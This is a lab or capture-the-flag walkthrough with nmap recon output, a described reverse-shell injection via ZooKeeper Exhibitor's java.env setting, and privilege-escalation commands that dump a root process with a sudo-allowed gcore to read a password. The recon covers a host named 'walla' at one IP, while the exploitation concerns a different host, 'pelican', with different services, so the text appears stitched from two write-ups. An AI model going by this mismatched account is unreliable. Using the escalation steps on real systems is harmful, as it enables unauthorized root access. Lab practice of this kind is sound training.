1.Reconnaissance
Beginning the initial nmap enumeratoin
sudo ./nmapAutomator.sh 192.168.185.97 all
[sudo] password for kali:
Running all scans on 192.168.185.97
Host is likely running Unknown OS!
———————Starting Port Scan———————–
PORT STATE SERVICE
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
———————Starting Script Scan———————–
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 02715dc8b943ba6ac8ed15c56cb2f5f9 (RSA)
| 256 f3e510d416a99e034738baac18245328 (ECDSA)
|_ 256 024f99ec856d794388b2b57cf091fe74 (ED25519)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=walla
| Subject Alternative Name: DNS:walla
| Not valid before: 2020-09-17T18:26:36
|_Not valid after: 2030-09-15T18:26:36
|_smtp-commands: walla, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
53/tcp open tcpwrapped
Service Info: Host: walla; OS: Linux; CPE: cpe:/o:linux:linux_kernel
———————Starting Full Scan————————
PORT STATE SERVICE
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
422/tcp open ariel3
8091/tcp open jamlink
42042/tcp open unknown
Making a script scan on extra ports: 422, 8091, 42042
PORT STATE SERVICE VERSION
422/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 02715dc8b943ba6ac8ed15c56cb2f5f9 (RSA)
| 256 f3e510d416a99e034738baac18245328 (ECDSA)
|_ 256 024f99ec856d794388b2b57cf091fe74 (ED25519)
8091/tcp open http lighttpd 1.4.53
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=RaspAP
|_http-title: Site doesn’t have a title (text/html; charset=UTF-8).
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: lighttpd/1.4.53
42042/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 02715dc8b943ba6ac8ed15c56cb2f5f9 (RSA)
| 256 f3e510d416a99e034738baac18245328 (ECDSA)
|_ 256 024f99ec856d794388b2b57cf091fe74 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
———————-Starting UDP Scan————————
No UDP ports are open
There aren’t any interesting shared SMB dirves.
We see three web services running on this client, CUPS-2.2 on port 631, Jetty 1.0 on port 8080, nginx 1.14.2 on port 8081
2.Enumeration
visitin the web service on port 8081 internally redirects us to the ZooKeeper control panel running on port 8080 on
http://192.168.245.98:8080/exhibitor/v1/ui/index.html
There is a vulnerability with this version of zookeeper which allows us to inject a reverse shell payload as java.env script arguments which is loaded upon
restarting the zookeeper service.
Refer:https://talosintelligence.com/vulnerability_reports/TALOS-2019-0790
Adding the payload and choosing commit at once .We receive the reverse shell.
3.Privilege Escalation
Then,get a foothold from targeted machine ,upload a linpeas and enumerate PE Vector
charles@pelican:/tmp$ ps -ef | grep "password-store"
root 527 1 0 22:08 ? 00:00:00 /usr/bin/password-store
root 24088 1 0 22:45 ? 00:00:00 /usr/bin/password-store
charles 24409 31105 0 22:46 pts/1 00:00:00 grep password-store
Now,we collected password-store PID,AND use gcore to export
charles@pelican:/tmp$ sudo -u root /usr/bin/gcore -a -o /home/charles/output 527
charles@pelican:~$ strings output.527
We can using string to read the output file and can find the password in it and we have root access.
